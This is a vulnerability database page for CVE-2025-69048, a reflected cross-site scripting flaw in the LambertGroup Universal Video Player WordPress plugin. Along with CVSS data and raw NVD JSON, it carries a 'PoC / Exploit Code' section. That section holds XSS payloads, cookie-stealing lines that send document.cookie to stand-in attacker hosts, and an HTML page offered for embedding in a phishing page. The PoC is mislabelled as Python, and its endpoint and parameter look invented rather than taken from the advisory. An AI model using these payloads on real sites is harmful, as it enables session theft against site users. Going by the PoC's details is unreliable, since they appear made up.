Security Vulnerability Report
中文
CVE-2025-69048 CVSS 7.1 HIGH

CVE-2025-69048

Published: 2026-01-22 17:16:18
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS.This issue affects Universal Video Player: from n/a through <= 3.8.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Universal Video Player <= 3.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69048 PoC: Reflected XSS in Universal Video Player --> <!-- Target: LambertGroup Universal Video Player <= 3.8.4 --> <!-- Attack Vector: Malicious URL with injected JavaScript --> <!-- PoC URL (encoded for demonstration) --> <!-- https://target-site.com/wp-content/plugins/universal-video-player/player.php?video_id=<script>alert(document.cookie)</script> --> <!-- Alternative PoC using event handler --> <!-- https://target-site.com/wp-content/plugins/universal-video-player/player.php?video_id=" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)" --> <!-- HTML PoC for embedding in phishing page --> <!DOCTYPE html> <html> <head> <title>CVE-2025-69048 PoC</title> </head> <body> <h2>Universal Video Player XSS PoC</h2> <p>Click the link below to test for vulnerability:</p> <!-- Basic XSS PoC --> <a href="http://target-site/wp-content/plugins/universal-video-player/player.php?video_id=<script>alert('XSS Vulnerability Confirmed')</script>" target="_blank"> Click Here (Basic XSS Test) </a> <br><br> <!-- Cookie Stealing PoC --> <a href="http://target-site/wp-content/plugins/universal-video-player/player.php?video_id=<img src=x onerror='fetch("https://attacker-controlled-site.com/log?cookie="+document.cookie)'>"> Click Here (Cookie Theft Test) </a> <br><br> <!-- Automated Testing Script --> <script> function testXSS(targetUrl) { // Construct malicious URL const xssPayload = "<script>alert('XSS Confirmed: CVE-2025-69048')</script>"; const maliciousUrl = targetUrl + '?video_id=' + encodeURIComponent(xssPayload); // Display the test URL console.log('Testing URL:', maliciousUrl); // Open in new window for testing // window.open(maliciousUrl); return maliciousUrl; } // Usage: testXSS('http://target-site/wp-content/plugins/universal-video-player/player.php'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69048", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:18.180", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS.This issue affects Universal Video Player: from n/a through <= 3.8.4."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup Universal Video Player universal-video-player permite XSS Reflejado. Este problema afecta a Universal Video Player: desde n/a hasta &lt;= 3.8.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/universal-video-player/vulnerability/wordpress-universal-video-player-plugin-3-8-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}